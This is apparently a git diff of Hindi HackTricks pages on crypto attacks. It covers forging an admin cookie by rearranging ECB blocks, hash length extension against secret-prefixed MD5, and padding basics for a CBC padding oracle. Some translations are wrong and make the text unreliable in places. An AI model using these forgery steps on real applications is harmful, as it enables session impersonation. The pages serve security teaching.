**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# ECB
|
||||
|
||||
(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक ब्लॉक को साफ पाठ के ब्लॉक से बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि स्पष्ट पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल एक ही कुंजी का उपयोग करके प्रत्येक स्पष्ट पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है।
|
||||
(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक साफ टेक्स्ट के ब्लॉक को** **साइपरटेक्स्ट के ब्लॉक से** **बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि साफ टेक्स्ट को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल कुंजी का उपयोग करके प्रत्येक साफ टेक्स्ट के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है।
|
||||
|
||||
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
|
||||
|
||||
|
@ -26,19 +27,19 @@ ECB का उपयोग करने के कई सुरक्षा प
|
|||
|
||||
# सुरक्षा दोष का पता लगाना
|
||||
|
||||
कल्पना करें कि आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\
|
||||
फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\
|
||||
आप पाता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान है, **बराबर** हैं। तब, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**।
|
||||
कल्पना करें आप किसी एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\
|
||||
फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें से दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\
|
||||
आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान हैं, **वे बराबर हैं**। तो, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**।
|
||||
|
||||
जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** हैं।
|
||||
जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है।
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
```
|
||||
यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। वे **ब्लॉक** जो **विभिन्न** हैं, वे उन ब्लॉक्स हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में कोई आवश्यक भिन्नता)।
|
||||
यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। **विभिन्न ब्लॉक** वे ब्लॉक हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में आवश्यक भिन्नता)।
|
||||
|
||||
अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह **कई उपयोक्ता नाम** उत्पन्न कर सकता है **जिनमें समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए:
|
||||
अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह बस **कई उपयोक्ता नाम उत्पन्न कर सकता है** जिनमें **समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए:
|
||||
|
||||
| उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): |
|
||||
| ---------------- | ---------------- | ------------------------- | --------------------------------- |
|
||||
|
@ -48,7 +49,7 @@ ECB का उपयोग करने के कई सुरक्षा प
|
|||
| 4 | 4 | 8 | 16 |
|
||||
| 7 | 7 | 14 | 16 |
|
||||
|
||||
# सुरक्षा दोष का शोधन
|
||||
# सुरक्षा कमजोरी का शोषण
|
||||
|
||||
## पूरे ब्लॉक हटाना
|
||||
|
||||
|
@ -56,24 +57,24 @@ ECB का उपयोग करने के कई सुरक्षा प
|
|||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
हम पहले बनाए गए पैटर्न `\x23U\xE45K\xCB\x21\xC8` को देख सकते हैं जो पिछले उपयोगकर्ता नाम के साथ बनाया गया था जिसमें केवल `a` शामिल था।\
|
||||
हम पहले से बनाए गए पैटर्न `\x23U\xE45K\xCB\x21\xC8` को देख सकते हैं जो उस उपयोगकर्ता नाम के साथ बनाया गया था जिसमें केवल `a` था।\
|
||||
फिर, आप पहले 8B ब्लॉक को हटा सकते हैं और आपको उपयोगकर्ता नाम `admin` के लिए एक मान्य कुकी मिलेगी:
|
||||
```
|
||||
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
## ब्लॉक्स को हटाना
|
||||
## ब्लॉकों को हटाना
|
||||
|
||||
कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_
|
||||
|
||||
इसलिए, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है:
|
||||
तो, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है:
|
||||
|
||||
* एक उपयोगकर्ता नाम जेनरेट करें जो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक साइज के साथ आप `username ` नामक उपयोगकर्ता नाम जेनरेट कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को जेनरेट करेगा।
|
||||
* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता नाम और रिक्त स्थानों को भरेगा, जिसे हम अनुकरण करना चाहते हैं, जैसे: `admin `
|
||||
* एक उपयोगकर्ता नाम जेनरेट करें जो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक का आकार होने पर आप `username ` नामक उपयोगकर्ता उत्पन्न कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को उत्पन्न करेगा।
|
||||
* फिर, एक पासवर्ड जेनरेट करें जो उसी संख्या के ब्लॉक्स को भरेगा जिसमें हम उपनामित करना चाहते हैं और रिक्त स्थान हों, जैसे: `admin `
|
||||
|
||||
इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता नाम का नकली है): `username |admin `
|
||||
इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता का नाम बना रहेगा): `username |admin `
|
||||
|
||||
** फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`**
|
||||
**फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और आप उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`**
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
|
||||
|
|
|
@ -1,42 +1,43 @@
|
|||
{% hint style="success" %}
|
||||
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# हमले का सारांश
|
||||
|
||||
एक सर्वर की कलर टेक्स्ट डेटा के साथ कुछ गुप्त से जोड़कर उस डेटा का हैश बनाता है। यदि आप जानते हैं:
|
||||
एक सर्वर की कलर टेक्स्ट डेटा के साथ कुछ गोपनीय जोड़कर उस डेटा को हैश कर रहा है। यदि आप जानते हैं:
|
||||
|
||||
* **गुप्त की लंबाई** (यह एक दी गई लंबाई सीमा से भी bruteforced किया जा सकता है)
|
||||
* **गोपनीय की लंबाई** (यह दी गई लंबाई सीमा से भी ब्रूटफोर्स किया जा सकता है)
|
||||
* **स्पष्ट पाठ डेटा**
|
||||
* **एल्गोरिथ्म (और यह हमले के लिए वंर्नरबल है)**
|
||||
* **एल्गोरिथ्म (और यह हमले के लिए वंशानुक्रमित है)**
|
||||
* **पैडिंग ज्ञात है**
|
||||
* आम तौर पर एक डिफ़ॉल्ट प्रयोग होता है, इसलिए अगर अन्य 3 आवश्यकताएं पूरी होती हैं, तो यह भी होता है
|
||||
* पैडिंग गुप्त+डेटा की लंबाई पर निर्भर होता है, इसलिए गुप्त की लंबाई की आवश्यकता है
|
||||
* पैडिंग गोपनीय+डेटा की लंबाई पर निर्भर होता है, इसलिए गोपनीय की लंबाई की आवश्यकता है
|
||||
|
||||
तो, एक **हमलावर** के लिए संभव है कि वह **डेटा** को **जोड़ सकता है** और **पिछले डेटा + जोड़े गए डेटा** के लिए एक मान्य **सिग्नेचर** उत्पन्न कर सकता है।
|
||||
|
||||
## कैसे?
|
||||
|
||||
मूल रूप से वंर्नरबल एल्गोरिथ्म पहले **डेटा ब्लॉक का हैश बनाते हैं**, और फिर, **पहले** बनाए गए **हैश** (स्थिति) से, वे **अगले डेटा ब्लॉक को जोड़ते हैं** और **उसे हैश करते हैं**।
|
||||
मूल रूप से, वंशानुक्रमित एल्गोरिथ्म पहले **डेटा ब्लॉक को हैश** करके हैश उत्पन्न करते हैं, और फिर, **पिछले** बनाए गए **हैश** (स्थिति) से, वे **अगले डेटा ब्लॉक को जोड़ते हैं** और **हैश** करते हैं।
|
||||
|
||||
फिर, यहां सोचें कि गुप्त "गुप्त" है और डेटा "डेटा" है, "गुप्तडेटा" का MD5 6036708eba0d11f6ef52ad44e8b74d5b है।\
|
||||
फिर, यहां यह विचार करें कि गोपनीय "गोपनीय" है और डेटा "डेटा" है, "गोपनीयडेटा" का MD5 6036708eba0d11f6ef52ad44e8b74d5b है।\
|
||||
यदि एक हमलावर "जोड़ना" स्ट्रिंग जोड़ना चाहता है तो वह:
|
||||
|
||||
* 64 "A" का MD5 उत्पन्न करें
|
||||
* पहले इनिशियलाइज़ हैश की स्थिति को 6036708eba0d11f6ef52ad44e8b74d5b पर बदलें
|
||||
* 64 "ए" का MD5 उत्पन्न करें
|
||||
* पहले से ही आरंभित हैश की स्थिति को 6036708eba0d11f6ef52ad44e8b74d5b पर बदलें
|
||||
* स्ट्रिंग "जोड़ना" जोड़ें
|
||||
* हैश समाप्त करें और परिणामी हैश "गुप्त" + "डेटा" + "पैडिंग" + "जोड़ना" के लिए **मान्य होगा**
|
||||
* हैश समाप्त करें और परिणामी हैश "गोपनीय" + "डेटा" + "पैडिंग" + "जोड़ना" के लिए एक **मान्य** होगा**
|
||||
|
||||
## **उपकरण**
|
||||
|
||||
|
@ -44,19 +45,20 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
## संदर्भ
|
||||
|
||||
आप इस हमले को [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) में अच्छी तरह से समझ सकते हैं
|
||||
आप इस हमले को अच्छी तरह से समझ सकते हैं [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,55 +1,56 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** और **PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# CBC - Cipher Block Chaining
|
||||
# CBC - साइफर ब्लॉक चेनिंग
|
||||
|
||||
CBC मोड में **पिछले एन्क्रिप्टेड ब्लॉक का उपयोग IV के रूप में** किया जाता है जिसे अगले ब्लॉक के साथ XOR किया जाता है:
|
||||
CBC मोड में **पिछले एन्क्रिप्टेड ब्लॉक का उपयोग IV के रूप में** किया जाता है अगले ब्लॉक के साथ XOR करने के लिए:
|
||||
|
||||
![CBC encryption](https://defuse.ca/images/cbc\_encryption.png)
|
||||
![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png)
|
||||
|
||||
CBC को **डिक्रिप्ट** करने के लिए **विपरीत** **ऑपरेशन** किए जाते हैं:
|
||||
CBC को डिक्रिप्ट करने के लिए **विपरीत** **ऑपरेशन** किए जाते हैं:
|
||||
|
||||
![CBC decryption](https://defuse.ca/images/cbc\_decryption.png)
|
||||
![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png)
|
||||
|
||||
ध्यान दें कि एक **एन्क्रिप्शन कुंजी** और एक **IV** का उपयोग करना आवश्यक है।
|
||||
ध्यान दें कि एक **एन्क्रिप्शन** **कुंजी** और एक **IV** का उपयोग करना आवश्यक है।
|
||||
|
||||
# संदेश पैडिंग
|
||||
|
||||
जैसा कि एन्क्रिप्शन **निश्चित आकार के ब्लॉक** में किया जाता है, इसलिए **पैडिंग** को सामान्यत: **अंतिम ब्लॉक** में उसकी लंबाई पूरी करने के लिए आवश्यक होता है।\
|
||||
आम तौर पर **PKCS7** का उपयोग किया जाता है, जो एक पैडिंग उत्पन्न करता है **जो ब्लॉक को पूरा करने के लिए आवश्यक बाइट्स की संख्या को दोहराता है**। उदाहरण के लिए, यदि अंतिम ब्लॉक में 3 बाइट छूट रही है, तो पैडिंग `\x03\x03\x03` होगा।
|
||||
जैसा कि एन्क्रिप्शन **निश्चित** **साइज** **ब्लॉक्स** में किया जाता है, इसलिए **पैडिंग** की आवश्यकता होती है **अंतिम** **ब्लॉक** की लंबाई पूरी करने के लिए।\
|
||||
आम तौर पर **PKCS7** का उपयोग किया जाता है, जो एक पैडिंग उत्पन्न करता है **आवश्यक** **बाइट्स** **की संख्या** **पूरी** **करने** के **लिए** ब्लॉक। उदाहरण के लिए, यदि अंतिम ब्लॉक में 3 बाइट्स की कमी है, तो पैडिंग `\x03\x03\x03` होगा।
|
||||
|
||||
एक **8 बाइट लंबाई के 2 ब्लॉक** के साथ और अधिक उदाहरणों पर ध्यान दें:
|
||||
एक **8 बाइट्स की लंबाई के 2 ब्लॉक्स** के साथ और अधिक उदाहरणों पर नजर डालें:
|
||||
|
||||
| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 |
|
||||
| बाइट #0 | बाइट #1 | बाइट #2 | बाइट #3 | बाइट #4 | बाइट #5 | बाइट #6 | बाइट #7 | बाइट #0 | बाइट #1 | बाइट #2 | बाइट #3 | बाइट #4 | बाइट #5 | बाइट #6 | बाइट #7 |
|
||||
| ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
|
||||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** |
|
||||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** |
|
||||
| P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
|
||||
| P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
|
||||
|
||||
ध्यान दें कि अंतिम उदाहरण में **अंतिम ब्लॉक पूरा था इसलिए एक और पैडिंग के साथ एक और उत्पन्न किया गया था**।
|
||||
ध्यान दें कि अंतिम उदाहरण में **अंतिम ब्लॉक पूरा था इसलिए केवल पैडिंग के साथ एक और उत्पन्न किया गया था**।
|
||||
|
||||
# पैडिंग ऑरेकल
|
||||
|
||||
जब एक एप्लिकेशन एन्क्रिप्टेड डेटा को डिक्रिप्ट करती है, तो पहले वह डेटा को डिक्रिप्ट करेगी; फिर वह पैडिंग को हटाएगी। पैडिंग को साफ करते समय, यदि **अमान्य पैडिंग एक पहचानने योग्य व्यवहार को ट्रिगर** करता है, तो आपके पास एक **पैडिंग ऑरेकल संरचना** है। पहचानने योग्य व्यवहार एक **त्रुटि**, **परिणामों की कमी**, या **धीमा प्रतिक्रिया** हो सकती है।
|
||||
जब एक एप्लिकेशन एन्क्रिप्टेड डेटा को डिक्रिप्ट करती है, तो पहले डेटा को डिक्रिप्ट किया जाएगा; फिर पैडिंग को हटाया जाएगा। पैडिंग को साफ करते समय, यदि **अमान्य पैडिंग एक पहचानने योग्य व्यवहार** को ट्रिगर करता है, तो आपके पास एक **पैडिंग ऑरेकल संरक्षितता** है। पहचानने योग्य व्यवहार एक **त्रुटि**, **परिणामों की कमी**, या **धीमा प्रतिक्रिया** हो सकती है।
|
||||
|
||||
इस व्यवहार को पहचानने पर, आप **एन्क्रिप्टेड डेटा को डिक्रिप्ट** कर सकते हैं और यहां तक कि **कोई साफ-टेक्स्ट एन्क्रिप्ट** कर सकते हैं।
|
||||
यदि आप इस व्यवहार को पहचानते हैं, तो आप **एन्क्रिप्टेड डेटा को डिक्रिप्ट** कर सकते हैं और यहाँ तक कि **कोई साफ-टेक्स्ट एन्क्रिप्ट** कर सकते हैं।
|
||||
|
||||
## उत्पीडन कैसे करें
|
||||
|
||||
